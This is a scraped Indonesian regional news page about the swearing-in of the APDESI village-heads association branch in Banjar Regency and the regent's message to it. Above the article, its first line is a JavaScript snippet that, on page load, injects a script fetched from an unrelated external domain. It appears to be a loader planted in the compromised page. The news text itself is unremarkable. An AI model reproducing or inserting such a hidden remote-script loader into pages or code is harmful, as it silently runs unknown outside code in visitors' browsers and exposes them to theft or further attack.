(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

DPC APDESI Kabupaten Banjar Dikukuhkan, Ini Pesan Bupati


KANALKALIMANTAN.COM, MARTAPURA – Dewan Pimpinan Cabang  APDESI Kabupaten Banjar dilantik oleh Dewan Pimpinan Daerah Asosiasi Pemerintah Desa Seluruh Indonesia (APDESI) Provinsi Kalimantan Selatan, Rabu (22/2/2023) siang.

Disaksikan Bupati Banjar H Saidi Mansyur dan undangan lainnya, Ketua APDESI Kalsel H Muhammad Gazali melantik dan mengukuhkan Ketua Dewan Pimpinan Cabang  APDESI Kabupaten Banjar Kasmayuda beserta kepengurusan.

Bupati Banjar Saidi Mansyur menyampaikan selamat kepada seluruh jajaran DPC APDESI yang baru dilantik, dan meminta untuk bekerja secara optimal, berkontribusi positif dalam pembangunan desa serta mendukung visi misi APDESI Kabupaten Banjar yang lebih baik.

“Dalam rapat kerja APDESI pada hari ini, para pengurus dapat memberikan saran yang inovatif dan kreatif sesuai dengan potensi dan sumberdaya di desa masing-masing,” katanya.

 

Baca juga: Sidang Korupsi Mantan Bupati HST, Direktur Pemberi Fee Dihadirkan, Sebut Setoran 7,5 hingga 10 Persen

Saidi berharap DPC APDESI dapat membangun kerjasama yang solid dan harmonis antara pemerintah daerah dan desa, juga nantinya dapat bekerjasama dengan pemerintah provinsi dan pusat.

Ketua DPC APDESI Banjar Kasmayuda menjelaskan, pembangunan dimulai dari desa sampai ke kabupaten dengan program-program dari APDESI untuk mendukung visi dan misi Kabupaten Banjar yang Maju, Mandiri dan Agamis (MANIS).

Foto bersama usai pelantikan DPC APDESI Banjar. Foto: DKISP Banjar

Program yang telah dilaksanakan sebut Kasmayuda seperti penyerahan bantuan sosial kepada korban kebakaran, serta kegiatan sosial lainnya.

“Kalau ada pambakal yang sakit disantuni dengan menggunakan dana santunan dari APDESI,” jelasnya.

Baca juga: Pemutakhiran Data Pemilih, Jangan Ditolak, Ini Atribut Petugas yang Perlu Dikenali

Untuk memperkuat APDESI, menurut dia harus bersinergi dan menjalin kekompakan dengan pihak kecamatan sehingga dapat proaktif dengan berbagai kegiatan.

Turut hadir Wakil Bupati Banjar Habib Idrus Al-Habsyie, Ketua DPP APDESI Arifin Abdul Majid, unsur Forkopimda, para camat dan sejumlah Kepala SKPD Lingkup Pemkab Banjar. (kanalkalimantan.com/rls)

Reporter: rls
Editor: Dhani


Al Ghifari

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

7 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

7 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

7 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

7 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

8 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

8 jam ago

This website uses cookies.